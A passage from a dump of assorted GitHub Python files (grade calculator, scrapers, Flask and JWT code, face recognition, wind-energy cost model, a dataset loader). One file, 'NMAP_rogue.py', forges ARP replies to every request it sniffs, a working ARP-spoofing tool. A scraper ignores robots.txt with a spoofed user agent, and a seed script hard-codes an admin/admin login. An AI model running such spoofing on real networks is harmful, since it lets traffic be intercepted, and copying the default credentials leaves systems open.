'M']\n\ndef start():\n prompt()\n mainScreen()\n user_response = input()\n while user_response != 'quit':\n if user_response in paths:\n if user_response != 'M':\n print('The classes have abbreivations w, e, a, c, s, pc, and p.')\n if user_response != '>':\n if user_response == '+':\n class_condition = addPath()\n if class_condition != True:\n user_response = classCondition(class_condition)\n continue # Avoids printing b_and_a\n else:\n pass\n elif user_response == '-': # Special, bc it deletes 1st\n class_condition = delPath() # so have to run b_and_a\n if class_condition != True:\n user_response = classCondition(class_condition)\n continue\n else:\n user_response = eContinue(user_response) # Can't run b_and_a\n continue # bc deletion from dict\n elif user_response == '|':\n class_condition = editPath()\n if class_condition != True:\n user_response = classCondition(class_condition)\n continue\n else:\n pass\n Averages.before_and_after() # Won't run if they aborted or error\n else: # If you're viewing, don't need to see before and after\n viewPath()\n user_response = eContinue(user_response) # Runs this if it's > | - +\n else:\n mainScreen()\n user_response = eContinue(user_response)\n else: # User entered something else\n print('\\nPlease look at the prompt again.')\n user_response = eContinue(user_response)\n","repo_name":"DNCHOW1/Python-Projects","sub_path":"GradeCalculator/Interactions.py","file_name":"Interactions.py","file_ext":"py","file_size_in_byte":6345,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"30302364271","text":"\"\"\"Module for shared test classes.\"\"\"\nimport unittest\n\nfrom app import create_app\nfrom app.settings import TestConfig\nfrom bootstrap import bootstrap\n\n\nclass baseTest(unittest.TestCase):\n \"\"\"Class that holds common test methods.\"\"\"\n\n def setUp(self):\n \"\"\"Initialize app and test db.\"\"\"\n app, db = create_app(config_object=TestConfig)\n app.app_context().push()\n self.app = app.test_client()\n self.db = db\n bootstrap(app, db)\n\n def tearDown(self):\n \"\"\"Destroy test db.\"\"\"\n self.db.session.remove()\n self.db.drop_all()\n","repo_name":"HassenPy/udacity-fsnd-item-catalog","sub_path":"app/tests.py","file_name":"tests.py","file_ext":"py","file_size_in_byte":588,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"31258250391","text":"#!/usr/bin/env python\n# coding: utf-8\n\nimport scrapy\nfrom scrapy.shell import inspect_response\nfrom scrapy.crawler import CrawlerProcess\nfrom scrapy.linkextractors import LinkExtractor\nfrom string import Template\nimport pandas as pd\n\nprocess = CrawlerProcess({'AUTOTHROTTLE_ENABLED': True, \n 'AUTOTHROTTLE_TARGET_CONCURRENCY': .20,\n 'HTTPCACHE_ENABLED': False, # remove for final scrape to get live data\n 'ROBOTSTXT_OBEY': False,\n 'USER_AGENT': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.113 Safari/537.36',\n 'FEEDS': {'../../../data/raw/artists_data.csv': {'format': 'csv'}},\n 'FEED_EXPORT_ENCODING': '\"utf-8\"'})\n\nclass RymArtistSpider(scrapy.Spider):\n name = 'RymArtists'\n pages = list(range(1, 2)) # set to 25 once multipage is working\n start_yr = 1950\n stop_yr = 1951 # sb 25 eventually \n start_urls = [f\"https://rateyourmusic.com/charts/top/album/{year}/{page}\"\n for page in pages for year in range(1950,1951)]\n\n def parse(self, response):\n \"\"\"Parses yearly top album chart pages to obtain artists w/urls\"\"\"\n if response.status == 404:\n return \n artist_xp = r'//a[@class=\"artist\"]/'\n artist_name_xp = artist_xp + 'text()'\n artist_url_xp = artist_xp + '@href'\n artist_names = response.xpath(artist_xp).getall()\n artist_urls = response.xpath(artists_url_xp).getall()\n # scrapy doesn't crawl dups by default, but this will prefilter anyway\n artists_dct = {name: 'rateyourmusic.com/' + url \n for name, url in zip(artist_names, artist_urls)}\n for artist, artist_url in artists_dict.items():\n yield scrapy.Request(artist_url, callback=artistparse,\n meta={'artist': artist})\n\n def artistparse(self, response):\n artist = response.meta.get('artist')\n album_url_xp = r'//a[has-class(\"album\")]/@href'\n albums = response.xpath(album_url_xp).getall()\n genres = response.xpath('//a[has-class(\"genre\")]/text()').getall()\n yield {'artist': artist,\n 'album_urls': albums,\n 'genres': genres}\n\nprocess.crawl(RymArtistSpider)\nprocess.start()\n","repo_name":"chrisoyer/music-review-pipeline","sub_path":"src/data/scrapy/artist_scrape.py","file_name":"artist_scrape.py","file_ext":"py","file_size_in_byte":2362,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"5446398364","text":"#!/usr/bin/env python3\n\nimport sqlite3\n\n\nconnection = sqlite3.connect('master.db', check_same_thread=False)\ncursor = connection.cursor()\n\ncursor.execute(\n \"\"\"\n INSERT INTO \n users\n (\n username,\n password,\n profile,\n initial_balance,\n cur_balance\n ) \n VALUES\n (\n 'admin',\n 'admin',\n 'A',\n 0.00,\n 0.00\n );\n \"\"\"\n)\n\nconnection.commit()\ncursor.close()\nconnection.close()\n","repo_name":"fodisi/WebTrader","sub_path":"core/setup/seed.py","file_name":"seed.py","file_ext":"py","file_size_in_byte":535,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"48"} +{"seq_id":"32272606349","text":"from flask_restplus import Resource, Namespace\nfrom flask_jwt_extended import (\n jwt_refresh_token_required,\n get_jwt_identity,\n create_access_token,\n)\n\n\nclass TokenRefresh(Resource):\n api = Namespace(\"School flask restplus\")\n\n @jwt_refresh_token_required\n @api.doc(responses={200: \"OK\"})\n def post(self):\n current_user = get_jwt_identity()\n new_token = create_access_token(identity=current_user, fresh=False)\n return {\"access_token\": new_token}, 200\n","repo_name":"asrmarco13/school-flask-restful","sub_path":"resources/token_refresh.py","file_name":"token_refresh.py","file_ext":"py","file_size_in_byte":493,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"48"} +{"seq_id":"43516959622","text":"# 정수 A를 B로 바꾸려고 한다. 가능한 연산은 다음과 같은 두 가지이다.\r\n#\r\n# 2를 곱한다.\r\n# 1을 수의 가장 오른쪽에 추가한다.\r\n# A를 B로 바꾸는데 필요한 연산의 최솟값을 구해보자.\r\n\r\nimport sys\r\ninput = sys.stdin.readline\r\n\r\nA, B = map(int, input().strip().split())\r\ncnt = 1\r\nwhile True:\r\n if A == B:\r\n break\r\n\r\n if B < A*2:\r\n cnt = -1\r\n break\r\n if B % 2 == 0:\r\n B //= 2\r\n cnt += 1\r\n else:\r\n if B % 10 == 1:\r\n B //= 10\r\n cnt += 1\r\n else:\r\n cnt = -1\r\n break\r\nprint(cnt)","repo_name":"dnwls16071/PS_Baekjoon","sub_path":"10000~/16953.py","file_name":"16953.py","file_ext":"py","file_size_in_byte":632,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"25337635646","text":"# Normalize an entire file\n\nfrom os import environ\nimport numpy as np\nimport common\n\n# Load a f32 format file (mono) \nINFILE=environ[\"INFILE\"]\nOUTFILE=environ[\"OUTFILE\"]\n# W is number of samples over which to determine the normalization factor\nW=float(environ[\"W\"])\n\nx=np.fromfile(INFILE,dtype='float32')\ny=x-np.mean(x)\ny/=np.max(np.abs(x))\ny.tofile(OUTFILE)\n\n","repo_name":"mondaugen/audio_limiter","sub_path":"tools/all_normalize.py","file_name":"all_normalize.py","file_ext":"py","file_size_in_byte":360,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"48"} +{"seq_id":"41871898335","text":"import torch\nfrom torch import nn\n\nimport rulelearn.algorithms.r2n.mask as wm\nfrom rulelearn.algorithms.r2n.base import RuleNetwork\n\n\nclass SimpleRuleNet(RuleNetwork):\n \"\"\"\n Class that assembles the rule network part of r2n. It initializes and configures the conjunction and disjunction layer. \n \"\"\"\n def __init__(self, n_conditions, n_rules, cooling=True):\n super(SimpleRuleNet, self).__init__()\n self.n_rules = n_rules\n self.n_conditions = n_conditions\n self.temp = 1\n self.cooling = cooling\n self.weightmask_1 = wm.SimpleWeightMask(self.n_rules, self.n_conditions, self.temp, self.cooling)\n self.weightmask_2 = wm.SimpleWeightMask(1, self.n_rules, self.temp, self.cooling)\n self.network = nn.Sequential(\n ConjunctionLayer(self.weightmask_1),\n DisjunctionLayer(self.weightmask_2),\n )\n\n def forward(self, x):\n return self.network(x)\n\n def extract_ruleset(self):\n ruleset = []\n w_conj = torch.heaviside(self.network[0].mask() - torch.tensor(0.5),\n torch.ones_like(self.network[0].mask()))\n w_disj = torch.heaviside(self.network[1].mask() - torch.tensor(0.5),\n torch.ones_like(self.network[1].mask()))\n for d_idx, d_weight in enumerate(torch.flatten(w_disj).tolist()):\n if d_weight > 0:\n rule = w_conj.tolist()[d_idx]\n if sum(rule) > 0:\n ruleset.append(rule)\n return ruleset\n\n def get_penalty(self):\n and_masks = self.network[0].mask()\n or_masks = self.network[1].mask()\n\n return (or_masks.sum() + and_masks.sum()) / self.n_rules\n\n def update_temp(self, temp):\n self.weightmask_1.set_temp(temp)\n self.weightmask_2.set_temp(temp)\n\n\nclass ConjunctionLayer(nn.Module):\n \"\"\"\n Conjuction layer (And layer)\n \"\"\"\n def __init__(self, mask):\n super(ConjunctionLayer, self).__init__()\n self.mask = mask\n\n def forward(self, x):\n neg_x = torch.ones_like(x) - x\n prod = torch.matmul(neg_x, torch.transpose(self.mask().float(), 0, 1))\n return torch.ones_like(prod) - torch.clamp(prod, max=1)\n\n\nclass DisjunctionLayer(nn.Module):\n \"\"\"\n Disjunction layer (OR layer)\n \"\"\"\n def __init__(self, mask):\n super(DisjunctionLayer, self).__init__()\n self.mask = mask\n\n def forward(self, x):\n return torch.clamp(torch.matmul(self.mask(), torch.transpose(x, 0, 1)), max=1)\n","repo_name":"IBM/rulelearn","sub_path":"rulelearn/algorithms/r2n/simple_rulenet.py","file_name":"simple_rulenet.py","file_ext":"py","file_size_in_byte":2541,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"48"} +{"seq_id":"73717712146","text":"import matplotlib.pyplot as plt\nimport matplotlib.animation as animation\nimport numpy as np\n\n\ndef animate_ouragan(vision_data, n=0):\n fig = plt.figure()\n ims = []\n for i in range(vision_data.shape[1]):\n #Show the geopotential--> 0\n #Show altitude -->1\n data = vision_data[n, i, 0, 1]\n img = plt.imshow(data, animated=True)\n ims.append([img])\n\n ani = animation.ArtistAnimation(fig, ims, interval=50, blit=True,\n repeat_delay=1000)\n return ani\n","repo_name":"leobix/hurricast","sub_path":"src/utils/plot.py","file_name":"plot.py","file_ext":"py","file_size_in_byte":527,"program_lang":"python","lang":"en","doc_type":"code","stars":12,"dataset":"github-code","pt":"48"} +{"seq_id":"6506688767","text":"import requests\nimport urllib.request\nimport time\nfrom bs4 import BeautifulSoup\nfrom typing import List, Dict\n\n\n# helper functions to retrieve specific text in div elements\ndef findSquareFootage(element):\n try:\n result = element.find('strong').text\n except:\n result = 'null'\n return result\n\ndef determineRentalTerm(element):\n try:\n if (element['class'][1] == 'has-rental-term'):\n result='Rent per square footage'\n except:\n result = 'Annual fee'\n return result\n\ndef addProperties(response: 'requests.models.Response') -> List[Dict]:\n # Container for dictionary objects\n pageResults=[]\n\n # parse the response object\n soup = BeautifulSoup(response.text, \"html.parser\")\n\n # find all tags with class matching address-container\n properties = soup.findAll(class_='address-container')\n price = soup.findAll(class_=['price has-rental-term', 'price'])\n characteristics = soup.findAll(class_='characteristics-cnt')\n\n # list comprehensions to use for generator expressions\n fullAddresses = [str.upper(x['data-address']) for x in properties]\n streetAddresses = [x.split(',')[0] for x in fullAddresses]\n\n # try to throw index error to test if there are results on this page\n try:\n fullAddresses[0]\n\n # generator functions for addProperties\n addressNumber = (x.split(' ')[0] for x in streetAddresses)\n addressStreet = (' '.join(x.split(' ')[1:-1]) for x in streetAddresses)\n streetSuffix = (x.split(' ')[-1] for x in streetAddresses)\n city = (x.split(',')[1] for x in fullAddresses)\n descriptions = (x['title'] for x in properties)\n prices = (x['data-price'] for x in price)\n rentType = (determineRentalTerm(x) for x in price)\n squarefeet = (findSquareFootage(x) for x in characteristics)\n\n while(True):\n try:\n entry = {\n 'adrno': next(addressNumber),\n 'adrstr': next(addressStreet),\n 'adrsuf': next(streetSuffix),\n 'city': next(city),\n 'description': next(descriptions),\n 'price': next(prices),\n 'rentType': next(rentType),\n 'sqft': next(squarefeet)\n }\n pageResults.append(entry)\n except StopIteration:\n print(\"Properties processed\")\n break\n except IndexError:\n print(\"No more results\")\n raise ValueError(\"Empty page. No properties to scrape!\")\n\n return pageResults\n \n\n# use this when dealing with data quality later\n# abbreviations = {'NORTH': 'N', 'WEST': 'W', 'EAST': 'E', 'SOUTH': 'S', 'HIGHWAY': 'HWY'}\n\ndef main():\n\n # container for all scraped properties\n results = {'properties': []}\n\n # Set user agent header field to prevent being blocked as bot\n headers = requests.utils.default_headers()\n headers.update({\n 'User-Agent': 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0',\n })\n\n # url for commercial properties website\n url = 'https://www.point2homes.com/US/Commercial-Properties-For-Lease/FL/Volusia-County.html'\n response = requests.get(url, headers=headers)\n\n # We don't want to use the append method. That would append a list of dicts to the list value of the properties key\n # Instead, we want to add the dict objects to a single list\n # Possible improvement: use itertools.chain() to add multiple objects from multiple lists to one list.\n # Or maybe use something like np.arr.flatten()\n results['properties'] = results['properties'] + addProperties(response)\n\n #iterate through all pages until list of addresses is empty\n pageNumber = 2\n while (response.status_code == 200):\n url = f'https://www.point2homes.com/US/Commercial-Properties-For-Lease/FL/Volusia-County.html?page={pageNumber}'\n response = requests.get(url, headers=headers)\n try:\n results['properties'] = results['properties'] + addProperties(response)\n print(\"Page number is: {}\".format(pageNumber))\n pageNumber = pageNumber + 1\n time.sleep(2)\n except ValueError as e:\n print(e)\n break\n\n return results\n\nif __name__=='__main__':\n main()","repo_name":"hall-alexander/volusia-county-socioeconomic-analysis","sub_path":"src/services/scrapCommercialProperties.py","file_name":"scrapCommercialProperties.py","file_ext":"py","file_size_in_byte":4335,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"646626137","text":"# 각 자리가 숫자(0~9)로만 이루어진 문자열 S가 주어졌을 때, 왼쪽부터 오른쪽으로 하나씩 모든 숫자를 확인하며\n# 숫자 사이에 'x' 혹은 '+' 연산자를 넣어 결과적으로 만들어질 수 있는 가장 큰 수를 구하는 프로그램을 작성하시오\n# 단, +보다 x를 먼저 계산하는 일반적인 방식과는 달리, 모든 연산은 왼쪽에서부터 순서대로 이루어진다고 가정합니다.\n\n#내가 씉 코드\n#풀이 : 0이거나 1이 나오면 +로 하고, 이것이 아닌 숫자가 나오면 *를 한다.\na=input().split()\nresult=0\nb=list()\nfor i in range(len(a[0])):\n b.append(int(a[0][i]))\n\nfor i in range(len(b)-1):\n if(b[i]<=1 or b[i+1]<=1):\n result=(b[i]+b[i+1])\n b[i+1]=result\n else:\n result = (b[i] * b[i + 1])\n b[i + 1] = result\nprint(result)\n\n\n\n#해답 : 두 수중에 0또는 1이 있으면 + 그게 아니면 x가 효율적이다.\ndata=input()\n#첫 번째 문자를 숫자로 변경하여 대입\nresult = int(data[0])\n\nfor i in range(1,len(data)):\n #두 수 중에서 하나라도 '0'혹은 '1'인 경우, 곱하기보다는 더하기 수행\n num = int(data[i])\n if num <= 1 or result<=1:\n result +=num\n else:\n result *=num\nprint(result)","repo_name":"YeongM/PythonPractice","sub_path":"GreedtAlgorithm/Greedy3.py","file_name":"Greedy3.py","file_ext":"py","file_size_in_byte":1287,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"25527033170","text":"#!/usr/bin/env python\n\nimport numpy as np\n\ndef posDef(M):\n\n n = int(np.sqrt(len(M)))\n M.resize((n,n))\n try:\n np.linalg.cholesky(0.5*(M+M.T))\n return 1\n except np.linalg.LinAlgError:\n return 0\n\ndef posDefMult(Ms):\n\n ind = np.zeros(Ms.shape[0],dtype=np.bool)\n for i in range(Ms.shape[0]):\n ind[i] = posDef(Ms[i])\n\n return ind\n\ndef find_wells(idnn,x):\n\n # Find \"wells\" (regions of convexity, with low gradient norm)\n\n # First, rereference the free energy\n pred = idnn.predict([x,x,x])\n mu_test = pred[1]\n eta_test = np.array([[0,0,0,0],\n [0.25,0.25,0.25,0.25]])\n y = idnn.predict([eta_test,eta_test,eta_test])[0]\n g0 = y[0,0]\n g1 = y[1,0]\n mu_test[:,0] = mu_test[:,0] - 4*(g1 - g0)\n gradNorm = np.sqrt(np.sum(mu_test**2,axis=-1))\n\n H = pred[2] # get the list of Hessian matrices\n ind2 = posDefMult(H) # indices of points with local convexity\n eta = x[ind2]\n gradNorm = gradNorm[ind2]\n\n ind3 = np.argsort(gradNorm)\n \n # Return eta values with local convexity, sorted by gradient norm (low to high)\n\n return eta[ind3]\n","repo_name":"sidsriva/graph_calculus","sub_path":"utility/convexity.py","file_name":"convexity.py","file_ext":"py","file_size_in_byte":1140,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"33811886219","text":"\n\ndef cell_mapping(lines_mapping):\n\tcell_x = {i:[] for i in list(set([i[0] for i in lines_mapping]))}\n\tfor line_map in lines_mapping:\n\t\tfrom_cell = line_map[0]\t\n\t\tmap_cell = line_map[2]\n\t\tif map_cell not in cell_x.get(from_cell):\n\t\t\tcell_x[from_cell] = cell_x.get(from_cell) + [map_cell]\n\treturn cell_x\t\n\n\nif __name__ == \"__main__\":\n\tprint(\"cell_mapping\")\n","repo_name":"LofOWL/Jupyter-code-tracker","sub_path":"mapping/cell_mapping/cell_mapping.py","file_name":"cell_mapping.py","file_ext":"py","file_size_in_byte":356,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"2198495127","text":"from typing import Tuple, Any\n\nimport pandas as pd\nfrom topografic import is_location_offshore, get_distance_to_coast\nimport geopandas as gpd\nimport streamlit as st\n\n@st.cache_data()\ndef read_tech_and_cable_data():\n cables = {\n 'max capacity': [250, 500, 750, 1000, 1250, 1500, 1750, 2000, 2250, 2500],\n 'Offshore substations': [1, 2, 2, 2, 3, 3, 4, 4, 4, 5],\n 'Export cables': [1, 2, 3, 3, 4, 5, 6, 6, 7, 8]\n }\n\n tech = pd.read_csv(\"../data/lcoe/tech_data.csv\", index_col=0)\n\n cables = pd.DataFrame(cables)\n return tech, cables\n\n\ndef choose_export_cables(capacity)->int:\n df = read_tech_and_cable_data()[1]\n\n # Prompt the user for the input capacity\n\n # Filter the DataFrame to find the number of export cables\n filtered_df = df[df['max capacity'] > capacity]\n num_export_cables = filtered_df['Export cables'].iloc[0]\n num_arrays = filtered_df['Offshore substations'].iloc[0]\n return num_export_cables, num_arrays\n\ndef calc_lcoe(capacity: float, power_yield: float, distance: float, depth: float, value: str=\"lower\"):\n \"\"\"\n # Todo: Check units\n :param capacity: Capacity of Turbine in MW\n :param power_yield: power yield for whole year in MWh\n :param distance: distance to coast in m\n :param depth: depth at location in m\n :param value: decision variable whether to use upper, middle or lower bounds\n where lower is meant in terms of low cost\n :return:\n \"\"\"\n\n tech = read_tech_and_cable_data()[0]\n # calculate capex costs\n # Turbine\n capex_turbine = (\n (\n tech.loc[\"Nominal investment (equipment: turbines) [M€/MW_e]\"][value]\n + tech.loc[\"Nominal investment (installation: turbines) [M€/MW_e]\"][value]\n )\n * capacity\n * 1e6\n )\n # Foundation\n if depth < 20: # Monopile\n capex_found = (\n tech.loc[\n \"Nominal investment (equipment + installation: foundation monopile) [M€/MW_e]\"\n ][value]\n * capacity\n * 1e6\n )\n\n elif depth > 20 and depth < 40: # Tripod\n capex_found = (\n tech.loc[\n \"Nominal investment (equipment + installation: foundation jacket) [M€/MW_e]\"\n ][value]\n * capacity\n * 1e6\n )\n else: # Floating\n capex_found = (\n tech.loc[\n \"Nominal investment (equipment+installation: foundation floating) [M€/MW_e]\"\n ][value]\n * capacity\n * 1e6\n )\n\n number_of_cables, num_arrays = choose_export_cables(capacity=capacity)\n\n # array cables\n capex_array = (\n (\n tech.loc[\"Nominal investment (equipment: array cables) [M€/MW]\"][value]\n + tech.loc[\"Nominal investment (installation: array cables) [M€/MW]\"][value]\n )\n * capacity\n * 1e6\n )\n\n # grid connection\n capex_export = (\n tech.loc[\n \"Nominal investment (equipment+installation: grid connection) [M€/km]\"\n ][value]\n *number_of_cables\n * distance\n * 1e6\n )\n\n # Planning\n capex_project = (\n tech.loc[\"Nominal investment (Project development etc.) [M€/MW_e]\"][value] * 1e6\n )\n # Sum total capex\n capex = capex_project + capex_export + capex_array + capex_turbine + capex_found\n # calculate annuity factor\n wacc = tech.loc[\"WACC_real [%]\"][value] / 100\n af = (wacc * pow((1 + wacc), tech.loc[\"Technical lifetime [years]\"][value])) / (\n pow((1 + wacc), tech.loc[\"Technical lifetime [years]\"][value]) - 1\n )\n # calculate OPEX\n opex = (\n tech.loc[\"Fixed O&M [€/MW_e/y]\"][value] * capacity\n + tech.loc[\"Variable O&M [€/MWh_e]\"][value] * power_yield\n )\n # calculate lcoe\n lcoe = ((capex * af) + opex) / power_yield\n return lcoe, pd.Series({\n \"Name\": \"Capex and Opex\",\n \"Capex_Turbine\": capex_turbine,\n \"Capex_Foundation\": capex_found,\n \"Capex_Array_Cables\": capex_array,\n \"Capex_Grid_Connection\": capex_export,\n \"Capex_Planning\": capex_project,\n \"Opex\": opex,\n })\n\n\ndef calc_lcoe_from_series(\n row: pd.Series,\n capacity: float,\n countries: gpd.GeoDataFrame,\n value: str = \"lower\",\n other_countries_connection: bool = True,\n progress: st.progress = None,\n number_of_values: int = 1\n) -> tuple[float | Any, float] | None:\n \"\"\"\n Takes a pandas series to calculate lcoe based on given series and its index.\n :return:\n \"\"\"\n\n offshore = is_location_offshore(countries=countries, point=row[\"geometry\"])\n if progress:\n progress.progress(row[\"index\"] / number_of_values)\n if offshore:\n distance = get_distance_to_coast(\n countries=countries,\n point=row[\"geometry\"],\n toggle=other_countries_connection,\n )\n return (\n calc_lcoe(\n power_yield=row[\"Generation in MWh\"],\n capacity=capacity,\n depth=row[\"depth\"],\n distance=distance,\n value=value,\n )[0],\n distance,\n )\n else:\n return None\n","repo_name":"FelixMau/offshore_LCOE","sub_path":"scripts/lcoe.py","file_name":"lcoe.py","file_ext":"py","file_size_in_byte":5302,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"9269738409","text":"import cv2\nimport numpy as np\nimport pickle\n\ncapt=cv2.VideoCapture('queue.mp4')\nfface=cv2.CascadeClassifier(\"haarcascade_frontalface_alt2.xml\")\npface=cv2.CascadeClassifier(\"haarcascade_profileface.xml\")\nrecognizer = cv2.face.LBPHFaceRecognizer_create()\nrecognizer.read(\"trainner.yml\")\nwith open(\"labels.pickle\", 'rb') as f:\n\tqlabels=pickle.load(f)\n\tlabels= {v:k for k,v in qlabels.items()}\n\nwhile True:\n ret,frame=capt.read()\n #img=cv2.imread(\"3.jpeg\")\n cgray=cv2.cvtColor(frame,cv2.COLOR_BGR2GRAY)\n gray=cv2.equalizeHist(cgray)\n inv_frame=cv2.flip(frame,1)\n inv_gray=cv2.cvtColor(inv_frame,cv2.COLOR_BGR2GRAY)\n ffaces=fface.detectMultiScale(gray,scaleFactor=1.3,minNeighbors=2)\n rfaces=pface.detectMultiScale(gray,scaleFactor=1.3,minNeighbors=2)\n lfaces=pface.detectMultiScale(inv_gray,scaleFactor=1.3,minNeighbors=2)\n font=cv2.FONT_HERSHEY_SIMPLEX\n for x,y,w,h in ffaces:\n roi=gray[y:y+h,x:x+w]\n _id,conf=recognizer.predict(roi)\n if conf<=90:\n cv2.rectangle(frame,(x,y),(x+w,y+h),(0,0,0),2)\n cv2.putText(frame,labels[_id],(x,y+20),font,1,(255,0,0),2)\n elif conf>=90 and conf<=110:\n cv2.rectangle(frame,(x,y),(x+w,y+h),(0,0,0),2)\n cv2.putText(frame,\"Not a Person\",(x,y+20),font,1,(255,0,0),2)\n print(conf)\n print(roi)\n for x,y,w,h in rfaces:\n roi=gray[y:y+h,x:x+w]\n _id,conf=recognizer.predict(roi)\n if conf<=100:\n cv2.rectangle(frame,(x,y),(x+w,y+h),(255,0,255),2)\n cv2.putText(frame,labels[_id],(x,y+20),font,1,(255,0,0),2)\n elif conf>=100 and conf<=110:\n cv2.rectangle(frame,(x,y),(x+w,y+h),(255,0,255),2)\n cv2.putText(frame,\"Not a Person\",(x,y+20),font,1,(255,0,0),2)\n print(conf)\n for x,y,w,h in lfaces:\n roi=inv_gray[y:y+h,x:x+w]\n print(roi)\n _id,conf=recognizer.predict(roi)\n if conf<=100:\n cv2.rectangle(frame,(x+40,y),(x+w+40,y+h),(255,255,0),2)\n cv2.putText(frame,labels[_id],(x,y+20),font,1,(255,0,0),2)\n elif conf>=100 and conf<=120:\n cv2.rectangle(frame,(x+40,y),(x+w+40,y+h),(255,255,0),2)\n cv2.putText(frame,\"Not a Person\",(x+40,y+20),font,1,(255,0,0),2)\n print(conf)\n cv2.imshow(\"frame\",frame)\n if cv2.waitKey(20) & 0xFF==ord(\" \"):\n exit(0)\n\n\n \n","repo_name":"saloni15495/Queue-Manager","sub_path":"fullfacedetect.py","file_name":"fullfacedetect.py","file_ext":"py","file_size_in_byte":2399,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"36918327747","text":"import socket\nimport struct\nimport binascii\nimport time\nimport textwrap\n\n\nclass Sniffer:\n def __init__(self):\n self.sourceMac = ''\n self.sourceIP = ''\n self.destMac = ''\n self.destIp = ''\n self.sock = socket.socket(socket.AF_PACKET, socket.SOCK_RAW, socket.htons(0x0003))\n self.sock.bind(('eth0', 0))\n self.read()\n\n def read(self):\n while True:\n packet = self.sock.recvfrom(2048)\n\n ethernet_header = packet[0][0:14]\n ethernet_detailed = struct.unpack(\"!6s6s2s\", ethernet_header)\n\n arp_header = packet[0][14:42]\n arp_detailed = struct.unpack(\"2s2s1s1s2s6s4s6s4s\", arp_header)\n\n if(binascii.hexlify(ethernet_detailed[2]) != b'0806'):\n continue\n\n print(\"****************_ETHERNET_FRAME_****************\")\n print(\"Dest MAC: \", binascii.hexlify(ethernet_detailed[0]))\n print(\"Source MAC: \", binascii.hexlify(ethernet_detailed[1]))\n print(\"Type: \", binascii.hexlify(ethernet_detailed[2]))\n print(\"************************************************\")\n print(\"******************_ARP_HEADER_******************\")\n print(\"Hardware type: \", binascii.hexlify(arp_detailed[0]))\n print(\"Protocol type: \", binascii.hexlify(arp_detailed[1]))\n print(\"Hardware size: \", binascii.hexlify(arp_detailed[2]))\n print(\"Protocol size: \", binascii.hexlify(arp_detailed[3]))\n print(\"Opcode: \", binascii.hexlify(arp_detailed[4]))\n print(\"Source MAC: \", binascii.hexlify(arp_detailed[5]))\n print(\"Source IP: \", socket.inet_ntoa(arp_detailed[6]))\n print(\"Dest MAC: \", binascii.hexlify(arp_detailed[7]))\n print(\"Dest IP: \", socket.inet_ntoa(arp_detailed[8]))\n print(\"*************************************************\\n\")\n\n self.sourceMac = ethernet_detailed[1]\n self.sourceIP = arp_detailed[6]\n self.destMac = arp_detailed[7]\n self.destIp = arp_detailed[8]\n\n self.ARPreply()\n\n def ARPreply(self):\n nulls = [0x00 for i in range(0, 18)]\n ARP_FRAME = [\n struct.pack('!6B', *self.sourceMac), # DESTINATION MAC ADDRESS\n struct.pack('!6B', *binascii.unhexlify(b'deadbeefdead')), # SOURCE MAC ADDRESS\n struct.pack('!H', 0x0806), # 0X0806 IS A ARP TYPE\n struct.pack('!H', 0x0001), # 0X0001 IS A ETHERNET HW TYPE\n struct.pack('!H', 0x0800), # 0X0800 IS A IPV4 PROTOCOL\n struct.pack('!B', 0x06), # 0X06 HW SIZE (MAC)\n struct.pack('!B', 0x04), # 0X04 PROTOCOL SIZE (IP)\n struct.pack('!H', 0x0002), # 0x0002 IS A ARP REPLY\n struct.pack('!6B', *binascii.unhexlify(b'deadbeefdead')), # SENDER MAC\n struct.pack('!4B', *self.destIp), # SENDER IP\n struct.pack('!6B', *self.sourceMac), # TARGET MAC\n struct.pack('!4B', *self.sourceIP), # TARGET IP\n struct.pack('!18B', *nulls)\n ]\n\n print(\"_________ARP reply___________\")\n print(\"DESTINATION MAC ADDRESS\",self.sourceMac )\n print(\"SOURCE MAC ADDRESS \", binascii.unhexlify(b'deadbeefdead'))\n print(\"SENDER MAC \", binascii.unhexlify(b'deadbeefdead'))\n print(\"SENDER IP \", struct.unpack('!4B', self.destIp))\n print(\"TARGET MAC \", struct.unpack('!6B', self.sourceMac))\n print(\"TARGET IP \", struct.unpack('!4B', self.sourceIP))\n print(\"_____________________________\")\n time.sleep(0.001)\n self.sock.send(b''.join(ARP_FRAME))\n\n\nif __name__ == \"__main__\":\n snif = Sniffer()","repo_name":"Odin-SG/ARPQueryReplyer","sub_path":"NMAP_rogue.py","file_name":"NMAP_rogue.py","file_ext":"py","file_size_in_byte":3831,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"73305402065","text":"from torch.utils.data import Dataset\nimport pandas as pd\nimport os\nimport numpy as np\nimport cv2\nimport json\n\nclass DoodlesRandomDataset(Dataset):\n \"\"\"Doodles csv dataset.\"\"\"\n\n def __init__(self, csv_file, root_dir, chunksize, mode='train', size=256, transform=None):\n \"\"\"\n Args:\n csv_file (string): Path to the csv file with annotations.\n root_dir (string): Directory with all the images.\n chunksize (int): chunk size per dataframe\n mode (string): Train or test mode.\n size (int): Size of output image.\n transform (callable, optional): Optional transform to be applied\n on a sample.\n \"\"\"\n self.root_dir = root_dir\n file = os.path.join(self.root_dir, csv_file)\n self.size = size\n self.mode = mode\n self.doodles = []\n for 